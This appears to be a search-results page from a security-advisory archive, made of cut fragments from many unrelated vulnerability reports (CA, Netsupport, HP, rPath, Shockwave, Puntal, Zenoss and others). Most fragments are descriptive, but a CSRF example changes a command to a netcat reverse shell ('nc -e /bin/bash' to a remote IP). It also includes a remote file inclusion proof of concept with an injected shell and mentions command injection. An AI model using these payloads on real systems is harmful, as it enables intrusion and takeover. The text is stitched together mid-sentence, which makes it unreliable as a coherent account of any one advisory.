Next Page >>
remote system
Mitigating Factors: For BrightStor ARCserve Backup for Laptops &
Desktops, only the server installation is affected. Client
installations are not affected. For CA Desktop Management Suite,
Unicenter Desktop Management Bundle, Unicenter Asset Management,
Unicenter Software Delivery and Unicenter Remote Control, only the
Managers and DSM Explorers are affected. Scalability Servers and
Agents are not affected.
Severity: CA has given this vulnerability a maximum risk rating
Mitigating Factors: For BrightStor ARCserve Backup for Laptops &
Desktops, only the server installation is affected. Client
installations are not affected. For CA Desktop Management Suite,
Unicenter Desktop Management Bundle, Unicenter Asset Management,
Unicenter Software Delivery and Unicenter Remote Control, only the
Managers and DSM Explorers are affected. Scalability Servers and
Agents are not affected.
Severity: CA has given this vulnerability a maximum risk rating
of High.
Impact:
///////
Remote code execution
Remote system registry read/write access
Remote shell command execution
EEM 8.1, 8.2, 8.2.1
eTrust Audit/SCC 8.0 sp2
Identity Manager r12
NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11
Unicenter Asset Management r11.1, r11.2
Unicenter Remote Control r11.2
Unicenter Service Catalog r2.2, r11.1
Unicenter Service Metric Analysis r11.1
Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2
Unicenter Software Delivery r11.1, r11.2
Unicenter Workload Control Center r11
Vendor: Netsupport
Product: Netsupport Manager
Vendor contacted 11 Nov 2009, fixed 11 Jan 2010 in version 10.60.0006
Netsupport gateway is a feature packaged with the netsupport manager product."Delivering seamless Remote Control between PCs that may be located behind different firewalls. The NetSupport Gateway provides a stable and secure method for NetSupport enabled systems to locate and communicate via http."
In all versions prior to 10.60.0006 it is possible to remotely crash the service by simply telneting to the port and hitting return twice, thereby causing a DoS. In versions prior to 10.60.0005 this would only work from linux or mac hosts, however in 10.60.0005 (which was an attempt to fix the issue) it resulted in this working from both linux, mac & windows hosts. This variation was down to the differnces in carriage returns between OS's. I presume that the root issue was providing null header information though the vendor never confirmed.
regards
###############################################################################
Reason: missing input data validation
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none
Result: attacker can upload any files to remote system
Source code snippet from script "check.php":
-----------------[ source code start ]---------------------------------
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
---------------------------
Impact: An unauthenticated remote attacker without any kind of
credentials can access the SMB service under the credentials of an
authorized user. Depending on the privileges of the authorized user, and
the configuration of the remote system, an attacker can gain read/write
access to the remote file system and execute arbitrary code by using
DCE/RPC over SMB.
Remotely Exploitable: Yes
Bugtraq Id: <unknown>
CVE: CVE-2010-0231
Overview:
/////////
The flaw is located in the software called HP Software Update shipped with the HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method giving a potential attacker the remote system arbitrary file write access.
Impact:
///////
Anand Pandey - One Line Facebook
Manish Chasta - Android Forensics
Bishan Singh Kochher - DOM XSS Encounter of the 3rd Kind
Nikhil Mittal - Mere pass Teensy hain
Elad Shapira - How Android based phone helped me win American Idol
Merchant Bhaumik - Handle Exploitation of Remote System from Email account
Prashant Verma - Pentesting Mobile Applications
Vivek Ramachandran - Wi-Fi malware for Fun and Profit
Aditya Gupta - Hacking you Droid
**** Workshops ****
SysAid IT Enterprise delivers the tools you need to meet any IT challenge - now and in the future.
Core Module(s):
Help Desk
Asset Management
Remote Control
End-User Web Portal
My Desktop
Mobile Application
Knowledge Base
Reports & Analysis
scripts with this feature which were tested. They can all be exploited by the
same malicious mp3. This includes:
* irssi: from http://irssi.org/scripts/: ixmmsa.pl 0.3, l33tmusic.pl 2.00,
mpg123.pl 0.01, ogg123.pl 0.01, xmms.pl 2.0, xmms2.pl 1.1.3, xmmsinfo.pl
1.1.1.1
* XChat: many from http://xchat.org: xmms-thing 1.0, XMMS Remote Control
Script 1.07, Disrok 1.0, a2x 0.0.1, Another xmms-info script 1.0, XChat-XMMS
0.8.1, and more...
* weechat: from http://weechat.flashtux.org/: now-playing.rb, xmms.pl 1.1
* BitchX: from http://scripts.bitchx.org/: xmms.bx 1.0
* Konversation: included media script
as files without extension (filename ends with dot) are retrievable, but in case
of "wrong" extension vulnerable python script will crash because of missing entry
in extensions array (formal definition: exception KeyError - Raised when a mapping
(dictionary) key is not found in the set of existing keys).
At first this seemed as minor security issue - only js, css, png, gif, html and
extensionless files from remote system can be retrieved. But after playing around
some time I found useful artifact - concatenation of space or dot character
to the end of the filename will pass through the python script without crashing
it and we can read arbitrary files from remote system.
Now this is major security issue here! Below is test script for proof of concept:
-------------------------------------------------------------------------------
======================================================================
Secunia Research 02/02/2009
- Free Download Manager Remote Control Server Buffer Overflow -
======================================================================
Table of Contents
Affected Software....................................................1
The specific flaw exists within the deserialization of RMIConnectionImpl
objects. Due to a lack of privilege checks during deserialization it is
possible to supply privileged code in the ClassLoader of a constructor
being deserialized. This allows for a remote attacker to call system
level Java functions without proper sandboxing. Exploitation of this can
lead to remote system compromise under the context of the currently
logged in user.
-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:
rPath Appliance Platform Linux Service 2
rPath Linux 2
Rating: Major
Exposure Level Classification:
Remote System User Deterministic Privilege Escalation
Updated Versions:
httpd=conary.rpath.com@rpl:2/2.2.9-1-0.1
mod_ssl=conary.rpath.com@rpl:2/2.2.9-1-0.1
rPath Issue Tracking System:
defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
2. Change and execute a command CSRF.
Change the ping command to be a netcat shell out to a remote system. In
this case an internal system running on port 443
http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
rPath Linux 1
rPath Linux 2
Rating: Severe
Exposure Level Classification:
Remote System User Deterministic Privilege Escalation
Updated Versions:
cups=conary.rpath.com@rpl:1/1.1.23-14.10-1
cups=conary.rpath.com@rpl:2/1.3.9-1.1-1
rPath Issue Tracking System:
rPath Security Advisory: 2007-0188-1
Published: 2007-09-17
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Remote System User Deterministic Unauthorized Access
Updated Versions:
php5=/conary.rpath.com@rpl:1/5.2.4-2-1
php5-cgi=/conary.rpath.com@rpl:1/5.2.4-2-1
php5-mysql=/conary.rpath.com@rpl:1/5.2.4-2-1
php5-pear=/conary.rpath.com@rpl:1/5.2.4-2-1
Products:
rPath Linux 1
Rating: Critical
Exposure Level Classification:
Remote System User Deterministic Unauthorized Access
Updated Versions:
php=conary.rpath.com@rpl:1/4.3.11-15.17-1
php-mysql=conary.rpath.com@rpl:1/4.3.11-15.17-1
php-pgsql=conary.rpath.com@rpl:1/4.3.11-15.17-1
The specific flaw exists during a race condition while repetitively
clicking between two elements at a fast rate. When clicking back and
forth between these two elements a corruption occurs resulting in a call
to a dangling pointer which can be further leveraged into code execution
via a heap spray. Exploitation of this vulnerability will lead to remote
system compromise under the credentials of the currently logged in user.
-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:
> page.
>
> The specific flaw exists in the URL handlers associated with iTunes.
> When processing URLs via the protocol handlers "itms", "itmss", "daap",
> "pcast", and "itpc" an exploitable stack overflow occurs. Successful
> exploitation can lead to a remote system compromise under the
> credentials of the currently logged in user.
>
> -- Vendor Response:
> Apple has issued an update to correct this vulnerability. More
> details can be found at:
TEHTRI-SA-2010-023 - Vuln in NEON Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-022 - Vuln in NEON Exploit Pack. SQL Injection.
TEHTRI-SA-2010-021 - Vuln in YES Exploit Pack. Remote File Disclosure.
TEHTRI-SA-2010-020 - Vuln in YES Exploit Pack. Permanent XSS+XSRF admin.
TEHTRI-SA-2010-019 - Vuln in YES Exploit Pack. Remote SQL Injection.
TEHTRI-SA-2010-018 - Vuln in LuckySploit Expl Pack. Remote control.
TEHTRI-SA-2010-017 - Vuln in Liberty Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-016 - Vuln in Liberty Exploit Pack. SQL Injection.
TEHTRI-SA-2010-015 - Vuln in Eleonore Exploit Pack. Another SQL Inject.
TEHTRI-SA-2010-014 - Vuln in Eleonore Exploit Pack. XSRF in admin panel.
TEHTRI-SA-2010-013 - Vuln in Eleonore Exploit Pack. Permanent XSS.
rPath Linux 1
rPath Linux 2
Rating: Major
Exposure Level Classification:
Remote System User Deterministic Denial of Service
Updated Versions:
openssl=conary.rpath.com@rpl:1/0.9.7f-10.20-1
openssl=conary.rpath.com@rpl:2/0.9.8g-7.7-1
openssl-scripts=conary.rpath.com@rpl:1/0.9.7f-10.13-1
openssl-scripts=conary.rpath.com@rpl:2/0.9.8g-7.7-1
in that a user must visit a malicious web site.
The specific flaw exists when the Shockwave player attempts to load a
specially crafted Adobe Director File. When a malicious value is used
during a memory dereference a possible 4-byte memory overwrite may
occur. Exploitation can lead to remote system compromise under the
credentials of the currently logged in user.
REF:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
By Michael Brooks
Vulnerability type: Multiple Remote System commands execution.
Software: Anon Proxy Server
Home page:http://sourceforge.net/projects/anonproxyserver/
Affects version: 0.100
installations of Adobe's Shockwave Player. User interaction is required
in that a user must visit a malicious web site.
The specific flaw exists when the Shockwave player attempts to load a
specially crafted Adobe Director File. When a malicious value is used
extern to signed integer . Exploitation can lead to remote system
compromise under the credentials of the currently logged in user.
ref
http://hi.baidu.com/fs_fx/blog/item/fa74a61705b5e24621a4e951.html
http://www.adobe.com/support/security/bulletins/apsb10-12.html
> remote
>> attacker could send a specially-crafted URL request to the "index.php"
> script
>> using the "app_path=" OR "puntal_path=" parameter to specify a malicious
> PHP
>> file from a remote system, which would allow the attacker to execute
> arbitrary
>> code on the vulnerable system.
>>
>> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>>
remote
> attacker could send a specially-crafted URL request to the "index.php"
script
> using the "app_path=" OR "puntal_path=" parameter to specify a malicious
PHP
> file from a remote system, which would allow the attacker to execute
arbitrary
> code on the vulnerable system.
>
> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>
Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
Puntal 2.1.0 is vulnerable; other versions may also be affected.
An attacker can exploit these issues via a browser.
-=[P0C]=-
http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
or
and cannot be used for authenticating to the administration web interface.
Submitted commands are included within data1 form variable, sent via a
POST request to the web server, and executed with the httpd web server
privileges, that is running with root privileges on the system, allowing
for complete remote control of the access point.
Two additional variables, data2 and data3 are processed by web server
code, but are not present in the form on the debug web page.
Command injection is also possible in data2 and data3 payload by using
typical shell commands concatenation.
Next Page>>
|
